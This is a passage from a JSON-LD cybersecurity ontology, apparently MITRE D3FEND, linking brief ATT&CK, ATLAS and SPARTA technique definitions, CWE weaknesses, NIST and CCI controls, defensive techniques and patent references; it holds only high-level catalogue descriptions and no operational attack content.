      "@id": "_:Nb0edd2ea9b184d86a2c920b9b8943e71",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-produce"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "_:Ndcc7d46666f2413981a975cec2f5ab40",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessToken"
      }
    },
    {
      "@id": "d3f:Clipboard",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The clipboard is a buffer that some operating systems provide for short-term storage and transfer within and between application programs. The clipboard is usually temporary and unnamed, and its contents reside in the computer's RAM. The clipboard is sometimes called the paste buffer. Windows, Linux and macOS support a single clipboard transaction. Each cut or copy overwrites the previous contents. Normally, paste operations copy the contents, leaving the contents available in the clipboard for further pasting.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Clipboard_(computing)"
      },
      "rdfs:label": "Clipboard",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:T1498.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1498.002",
      "d3f:definition": "Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.",
      "d3f:produces": {
        "@id": "d3f:InboundInternetNetworkTraffic"
      },
      "rdfs:label": "Reflection Amplification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1498"
        },
        {
          "@id": "_:Nd16bd31f968049d8a383aa29aba206ee"
        }
      ]
    },
    {
      "@id": "_:Nd16bd31f968049d8a383aa29aba206ee",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:UserAccount",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A user account allows a user to authenticate to a system and potentially to receive authorization to access resources provided by or connected to that system; however, authentication does not imply authorization. To log into an account, a user is typically required to authenticate oneself with a password or other credentials for the purposes of accounting, security, logging, and resource management.",
      "d3f:identified-by": {
        "@id": "d3f:DigitalIdentity"
      },
      "d3f:used-by": {
        "@id": "d3f:Agent"
      },
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/User_(computing)#User_account"
      },
      "rdfs:label": "User Account",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:User_account"
        },
        {
          "@id": "https://schema.ocsf.io/objects/user"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N9af0da3f71a54b95af2e8c6f32e5ca32"
        },
        {
          "@id": "_:N10e59d5abceb43c7b21cab62d3b52472"
        }
      ]
    },
    {
      "@id": "_:N9af0da3f71a54b95af2e8c6f32e5ca32",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:identified-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalIdentity"
      }
    },
    {
      "@id": "_:N10e59d5abceb43c7b21cab62d3b52472",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:used-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Agent"
      }
    },
    {
      "@id": "d3f:T1413",
      "@type": "owl:Class",
      "d3f:attack-id": "T1413",
      "d3f:definition": "On versions of Android prior to 4.1, an adversary may use a malicious application that holds the READ_LOGS permission to obtain private keys, passwords, other credentials, or other sensitive data stored in the device's system log. On Android 4.1 and later, an adversary would need to attempt to perform an operating system privilege escalation attack to be able to access the log.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Access Sensitive Data in Device Logs - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileCollectionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileCredentialAccessTechnique"
        }
      ],
      "skos:prefLabel": "Access Sensitive Data in Device Logs"
    },
    {
      "@id": "d3f:T1671",
      "@type": "owl:Class",
      "d3f:attack-id": "T1671",
      "d3f:definition": "Adversaries may achieve persistence by leveraging OAuth application integrations in a software-as-a-service environment. Adversaries may create a custom application, add a legitimate application into the environment, or even co-opt an existing integration to achieve malicious ends.(Citation: Push Security SaaS Persistence 2022)(Citation: SaaS Attacks GitHub Evil Twin Integrations)",
      "rdfs:label": "Cloud Application Integration",
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:Reference-ActiveFirewallSystemAndMethodology_McAfeeLLC",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US6550012B1"
      },
      "d3f:kb-abstract": "System and methodology providing automated or \"proactive\" network security (\"active\" firewall) are described. The system implements methodology for verifying or authenticating communications, especially between network security components thereby allowing those components to share information. In one embodiment, a system implementing an active firewall is provided which includes methodology for verifying or authenticating communications between network components (e.g., sensor(s), arbiter, and actor(s)), using cryptographic keys or digital certificates. Certificates may be used to digitally sign a message or file and, in a complementary manner, to verify a digital signature. At the outset, particular software components that may participate in authenticated communication are specified, including creating a digital certificate for each such software component. Upon detection by a sensor that an event of interest that has occurred in the computer network system, the system may initiate authenticated communication between the sensor component and a central arbiter (e.g., \"event orchestrator\") component, so that the sensor may report the event to the arbiter or \"brain.\" Thereafter, the arbiter (if it chooses to act on that information) initiates authenticated communication between itself and a third software component, an \"actor\" component (e.g., \"firewall\"). The arbiter may indicate to the actor how it should handle the event. The actor or firewall, upon receiving the information, may now undertake appropriate action, such as dynamically creating or modifying rules for appropriately handling the event, or it may choose to simply ignore the information.",
      "d3f:kb-author": "Emilio Villa, Adrian Zidaritz, Michael David Varga, Gerhard Eschelbeck, Michael Kevin Jones, Mark James McArdle",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "McAfee LLC",
      "d3f:kb-reference-of": {
        "@id": "d3f:InboundTrafficFiltering"
      },
      "d3f:kb-reference-title": "Active firewall system and methodology",
      "rdfs:label": "Reference - Active firewall system and methodology - McAfee LLC"
    },
    {
      "@id": "d3f:DigitalInformation",
      "@type": "owl:Class",
      "d3f:definition": "Digital information is a broad category of encoded representations in digital form that convey meaning, instructions, or functionality.",
      "rdfs:label": "Digital Information",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalArtifact"
      }
    },
    {
      "@id": "d3f:MemoryEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing operations on the memory resources of a system, encompassing allocation, modification, access, protection, or deallocation.",
      "rdfs:label": "Memory Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/memory_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:N53c505cc40fb4673834284041cbc3bf4"
        },
        {
          "@id": "_:Nf58073eb11994873aa10f8d8de8853bd"
        }
      ]
    },
    {
      "@id": "_:N53c505cc40fb4673834284041cbc3bf4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryAddress"
      }
    },
    {
      "@id": "_:Nf58073eb11994873aa10f8d8de8853bd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryExtent"
      }
    },
    {
      "@id": "d3f:CWE-1265",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1265",
      "d3f:definition": "During execution of non-reentrant code, the product performs a call that unintentionally produces a nested invocation of the non-reentrant code.",
      "rdfs:label": "Unintended Reentrant Invocation of Non-reentrant Code Via Nested Calls",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-691"
      }
    },
    {
      "@id": "d3f:d3fend-process-object-property",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "d3fend-process-object-property",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-object-property"
      }
    },
    {
      "@id": "d3f:CWE-1192",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1192",
      "d3f:definition": "The System-on-Chip (SoC) does not have unique, immutable identifiers for each of its components.",
      "rdfs:label": [
        "Improper Identifier for IP Block used in System-On-Chip (SOC)",
        "System-on-Chip (SoC) Using Components without Unique, Immutable Identifiers"
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-657"
      }
    },
    {
      "@id": "d3f:d3fend-tactical-verb-property",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "d3fend-tactical-verb-property",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-object-property"
      }
    },
    {
      "@id": "d3f:Reference-DomainKeysIdentifiedMail-Signatures-IETF",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://tools.ietf.org/html/rfc6376"
      },
      "d3f:kb-abstract": "DomainKeys Identified Mail (DKIM) permits a person, role, or organization that owns the signing domain to claim some responsibility for a message by associating the domain with the message.  This can be an author's organization, an operational relay, or one of their agents.  DKIM separates the question of the identity of the Signer of the message from the purported author of the message.  Assertion of responsibility is validated through a\ncryptographic signature and by querying the Signer's domain directly\nto retrieve the appropriate public key.  Message transit from author to recipient is through relays that typically make no substantive change to the message content and thus preserve the DKIM signature.",
      "d3f:kb-author": "D. Crocker, T. Hansen, M. Kucherawy",
      "d3f:kb-organization": "Internet Engineering Task Force (IETF)",
      "d3f:kb-reference-of": {
        "@id": "d3f:TransferAgentAuthentication"
      },
      "d3f:kb-reference-title": "RFC 6376: DomainKeys Identified Mail (DKIM) Signatures",
      "rdfs:label": "Reference - RFC 6376: DomainKeys Identified Mail (DKIM) Signatures - IETF"
    },
    {
      "@id": "d3f:InternetArticleReference",
      "@type": "owl:Class",
      "d3f:pref-label": "Internet Article",
      "rdfs:label": "Internet Article Reference",
      "rdfs:subClassOf": {
        "@id": "d3f:TechniqueReference"
      },
      "skos:altLabel": "Internet Blog Reference"
    },
    {
      "@id": "d3f:EX-0008.01",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0008.01",
      "d3f:definition": "Execution is keyed to a fixed wall-clock timestamp or epoch, independent of current vehicle state. The implant watches a trusted time source, GNSS-derived time, crosslink-distributed network time, oscillator-disciplined UTC/TAI, or mission elapsed time anchored at activation, and triggers exactly at a programmed date/time. Absolute triggering supports coordinated multi-asset actions and allows long dormancy with a precise activation moment. Variants incorporate calendar logic (e.g., “first visible pass after YYYY-MM-DD hh:mm:ss”) or guard bands to fire only if the clock is within certain tolerances, ensuring the event occurs even with minor drift yet remains rare enough to blend with scheduled operations.",
      "rdfs:label": "Absolute Time Sequences - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0008/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0008"
      },
      "skos:prefLabel": "Absolute Time Sequences"
    },
    {
      "@id": "d3f:T1165",
      "@type": "owl:Class",
      "d3f:attack-id": "T1165",
      "d3f:definition": "Per Apple’s documentation, startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items (Citation: Startup Items). This is technically a deprecated version (superseded by Launch Daemons), and thus the appropriate folder, <code>/Library/StartupItems</code> isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), <code>StartupParameters.plist</code>, reside in the top-level directory.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1037.005",
      "rdfs:label": "Startup Items",
      "rdfs:seeAlso": {
        "@id": "d3f:T1037.005"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:T1608.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1608.002",
      "d3f:definition": "Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.",
      "rdfs:label": "Upload Tool",
      "rdfs:subClassOf": {
        "@id": "d3f:T1608"
      }
    },
    {
      "@id": "d3f:AML.T0037",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0037",
      "d3f:definition": "Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.\n\nThis can include basic fingerprinting information and sensitive data such as ssh keys.",
      "rdfs:label": "Data from Local System - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0037"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASCollectionTechnique"
      },
      "skos:prefLabel": "Data from Local System"
    },
    {
      "@id": "d3f:ProcessCodeSegment",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:Subroutine"
      },
      "d3f:definition": "A process code segment, also known as a text segment or simply as text, is a portion of the program's virtual address space that contains executable instructions and corresponds to the loaded image code segment. Includes additional sections such as an import table.",
      "d3f:may-contain": {
        "@id": "d3f:ProcessSegment"
      },
      "rdfs:label": "Process Code Segment",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:ImageCodeSegment"
        },
        {
          "@id": "dbr:Code_segment"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessSegment"
        },
        {
          "@id": "_:N017158c0c6c24b0c829b2fb83eec17ce"
        },
        {
          "@id": "_:N35b01fe58f514c96965ef8f07e56a820"
        }
      ],
      "skos:altLabel": "Process Text Segment"
    },
    {
      "@id": "_:N017158c0c6c24b0c829b2fb83eec17ce",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "_:N35b01fe58f514c96965ef8f07e56a820",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessSegment"
      }
    },
    {
      "@id": "d3f:T1003.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:EncryptedCredential"
      },
      "d3f:attack-id": "T1003.003",
      "d3f:definition": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in <code>%SystemRoot%\\NTDS\\Ntds.dit</code> of a domain controller.(Citation: Wikipedia Active Directory)",
      "rdfs:label": "NTDS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1003"
        },
        {
          "@id": "_:N5f1a9d0d963742b18badfa6cf6af428f"
        }
      ]
    },
    {
      "@id": "_:N5f1a9d0d963742b18badfa6cf6af428f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EncryptedCredential"
      }
    },
    {
      "@id": "d3f:CWE-23",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-23",
      "d3f:definition": "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as \"..\" that can resolve to a location that is outside of that directory.",
      "d3f:synonym": "Zip Slip",
      "rdfs:label": "Relative Path Traversal",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-22"
      }
    },
    {
      "@id": "d3f:ST0007",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SPARTATactic"
      ],
      "d3f:definition": "Threat actor is trying to move through across sub-systems of the spacecraft.",
      "d3f:display-order": 7,
      "rdfs:label": "Lateral Movement - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/tactic/ST0007"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OffensiveTactic"
        },
        {
          "@id": "d3f:SPARTATactic"
        }
      ],
      "skos:prefLabel": "Lateral Movement"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_21",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Physical or Logical Separation of Information Flows",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(21)"
    },
    {
      "@id": "d3f:CCI-002306_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:SystemConfigurationPermissions"
        },
        {
          "@id": "d3f:UserAccountPermissions"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides authorized individuals the capability to define or change the type of security attributes available for association with subjects.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002306"
    },
    {
      "@id": "d3f:CWE-200",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-200",
      "d3f:definition": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.",
      "d3f:synonym": [
        "Information Disclosure",
        "Information Leak"
      ],
      "rdfs:label": "Exposure of Sensitive Information to an Unauthorized Actor",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:ResourceAccessPatternAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ResourceAccessPatternAnalysis"
      ],
      "d3f:analyzes": [
        {
          "@id": "d3f:Authentication"
        },
        {
          "@id": "d3f:Authorization"
        }
      ],
      "d3f:d3fend-id": "D3-RAPA",
      "d3f:definition": "Analyzing the resources accessed by a user to identify unauthorized activity.",
      "d3f:kb-article": "## How it works\nThis technique analyzes a user's resource accesses by comparing the user's recent activity against a baseline activity model. Major differences between the current activity and the baseline model might indicate unauthorized activity if they are severe enough.\n\n\n## Considerations\n* Potential for false positives from anomalies that are not associated with malicious activity.\n* Attackers that move low and slow may not differentiate their resource access activity behavior enough to trigger an alert.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-HostIntrusionPreventionSystemUsingSoftwareAndUserBehaviorAnalysis_SophosLtd"
        },
        {
          "@id": "d3f:Reference-MethodAndApparatusForNetworkFraudDetectionAndRemediationThroughAnalytics_IdaptiveLLC"
        },
        {
          "@id": "d3f:Reference-ModelingUserAccessToComputerResources_DaedalusGroupLLC"
        },
        {
          "@id": "d3f:Reference-SystemAndMethodThereofForIdentifyingAndRespondingToSecurityIncidentsBasedOnPreemptiveForensics_PaloAltoNetworksInc"
        },
        {
          "@id": "d3f:Reference-System,Method,AndComputerProgramProductForDetectingAndAssessingSecurityRisksInANetwork_ExabeamInc"
        }
      ],
      "rdfs:label": "Resource Access Pattern Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserBehaviorAnalysis"
        },
        {
          "@id": "_:N207b7ae582204268be684bc125702b88"
        },
        {
          "@id": "_:Nb66a28cabd2946a6b3a6118038cc78ec"
        }
      ]
    },
    {
      "@id": "_:N207b7ae582204268be684bc125702b88",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authentication"
      }
    },
    {
      "@id": "_:Nb66a28cabd2946a6b3a6118038cc78ec",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authorization"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2021-05-004%3ABITSJobPersistence_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-05-004/"
      },
      "d3f:kb-abstract": "The following query identifies Microsoft Background Intelligent Transfer Service utility bitsadmin.exe scheduling a BITS job to persist on an endpoint. The query identifies the parameters used to create, resume or add a file to a BITS job. Typically seen combined in a oneliner or ran in sequence. If identified, review the BITS job created and capture any files written to disk. It is possible for BITS to be used to upload files and this may require further network data analysis to identify. You can use bitsadmin /list /verbose to list out the jobs during investigation.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-05-004: BITS Job Persistence",
      "rdfs:label": "Reference - CAR-2021-05-004: BITS Job Persistence - MITRE"
    },
    {
      "@id": "d3f:REC-0008.02",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0008.02",
      "d3f:definition": "Threat actors enumerate the software factory: where source lives, how dependencies are pulled, how artifacts are built, signed, stored, and promoted to flight. They inventory repos and access models, CI/CD orchestrators, build containers and base images, package registries, signing services/HSMs, update channels, and the policies that gate promotion (tests, reviews, attestations). With this, an adversary can plan dependency confusion or typosquatting attacks, modify build scripts, poison cached artifacts, or swap binaries at distribution edges (mirrors, CDN, ground station staging).",
      "rdfs:label": "Software Recon - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0008/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0008"
      },
      "skos:prefLabel": "Software Recon"
    },
    {
      "@id": "d3f:M1047",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:d3fend-comment": "M1047 scope is broad, touches on an wide variety of techniques in d3fend.",
      "d3f:related": [
        {
          "@id": "d3f:DomainAccountMonitoring"
        },
        {
          "@id": "d3f:LocalAccountMonitoring"
        },
        {
          "@id": "d3f:SystemFileAnalysis"
        }
      ],
      "rdfs:label": "Audit"
    },
    {
      "@id": "d3f:T1574.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1574.001",
      "d3f:definition": "Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.",
      "d3f:may-create": {
        "@id": "d3f:SharedLibraryFile"
      },
      "rdfs:label": "DLL",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1574"
        },
        {
          "@id": "_:N57b60b508a29447bb805d3abcf67967c"
        }
      ]
    },
    {
      "@id": "_:N57b60b508a29447bb805d3abcf67967c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "d3f:HomoglyphDenylisting",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:HomoglyphDenylisting"
      ],
      "d3f:d3fend-id": "D3-HDL",
      "d3f:definition": "Blocking DNS queries that are deceptively similar to legitimate domain names.",
      "d3f:kb-article": "## How it works\n\nHomoglyph domain blacklisting considers the domain and subdomain structure of a lookup and compares the named components to blacklisted named components. The blacklisted named components are typically crafted modifications of known good domains, e.g., gooogle.com versus google.com. The blacklisted domains typically resemble trusted domains, but have been altered slightly to deceive users.\n\nThe blacklisted named components also include consideration for fonts or Unicode characters that can make certain characters appear very similar (zero vs capital O and the letter l vs the number one). The blacklisted domains under certain fonts will appear to be a trusted domain.\n\n## Considerations\n* Maintaining the currency of the list can be a challenge especially with newly registered domain entries.\n* Blacklists should have identified maintenance cycles to ensure lists are not stale.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-DetectionOfMaliciousIDNHomoglyphDomains"
      },
      "d3f:synonym": "Homoglyph Blacklisting",
      "rdfs:label": "Homoglyph Denylisting",
      "rdfs:subClassOf": {
        "@id": "d3f:ForwardResolutionDomainDenylisting"
      }
    },
    {
      "@id": "d3f:CWE-1288",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1288",
      "d3f:definition": "The product receives a complex input with multiple elements or fields that must be consistent with each other, but it does not validate or incorrectly validates that the input is actually consistent.",
      "rdfs:label": "Improper Validation of Consistency within Input",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-20"
      }
    },
    {
      "@id": "d3f:CWE-367",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-367",
      "d3f:definition": "The product checks the state of a resource before using that resource, but the resource's state can change between the check and the use in a way that invalidates the results of the check. This can cause the product to perform invalid actions when the resource is in an unexpected state.",
      "d3f:synonym": [
        "TOCCTOU",
        "TOCTTOU"
      ],
      "rdfs:label": "Time-of-check Time-of-use (TOCTOU) Race Condition",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-362"
      }
    },
    {
      "@id": "d3f:AML.TA0004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0004",
      "d3f:definition": "The adversary is trying to gain access to the AI system.\n\nThe target system could be a network, mobile device, or an edge device such as a sensor platform.\nThe AI capabilities used by the system could be local with onboard or cloud-enabled AI capabilities.\n\nInitial Access consists of techniques that use various entry vectors to gain their initial foothold within the system.",
      "rdfs:label": "Initial Access - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0004"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Initial Access"
    },
    {
      "@id": "d3f:CCI-001399_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system supports and maintains the binding of organization-defined security attributes to information in storage.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001399"
    },
    {
      "@id": "d3f:T1595.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1595.003",
      "d3f:definition": "Adversaries may iteratively probe infrastructure using brute-forcing and crawling techniques. While this technique employs similar methods to [Brute Force](https://attack.mitre.org/techniques/T1110), its goal is the identification of content and infrastructure rather than the discovery of valid credentials. Wordlists used in these scans may contain generic, commonly used names and file extensions or terms specific to a particular software. Adversaries may also create custom, target-specific wordlists using data gathered from other Reconnaissance techniques (ex: [Gather Victim Org Information](https://attack.mitre.org/techniques/T1591), or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).",
      "rdfs:label": "Wordlist Scanning",
      "rdfs:subClassOf": {
        "@id": "d3f:T1595"
      }
    },
    {
      "@id": "d3f:CWE-1302",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1302",
      "d3f:definition": "The product implements a security identifier mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. A transaction is sent without a security identifier.",
      "rdfs:label": [
        "Missing Security Identifier",
        "Missing Source Identifier in Entity Transactions on a System-On-Chip (SOC)"
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1294"
      }
    },
    {
      "@id": "d3f:Reference-Finding_phishing_sites",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US8839418B2/"
      },
      "d3f:kb-author": "Geoffrey John Hulten, Paul Stephen Rehfuss, Robert Rounthwaite, Joshua Theodore Goodman, Gopalakrishnan Seshadrinathan, Anthony P. Penta, Manav Mishra, Roderic C. Deyo, Elliott Jeb Haber, David Aaron Ward Snelling",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:DomainNameReputationAnalysis"
        },
        {
          "@id": "d3f:IPReputationAnalysis"
        },
        {
          "@id": "d3f:URLReputationAnalysis"
        }
      ],
      "d3f:kb-reference-title": "Finding phishing sites",
      "rdfs:label": "Reference - Finding phishing sites"
    },
    {
      "@id": "d3f:CWE-1422",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1422",
      "d3f:definition": "A processor event or prediction may allow incorrect or stale data to be forwarded to transient operations, potentially exposing data over a covert channel.",
      "rdfs:label": "Exposure of Sensitive Information caused by Incorrect Data Forwarding during Transient Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1420"
      }
    },
    {
      "@id": "d3f:T1199",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1199",
      "d3f:creates": {
        "@id": "d3f:LoginSession"
      },
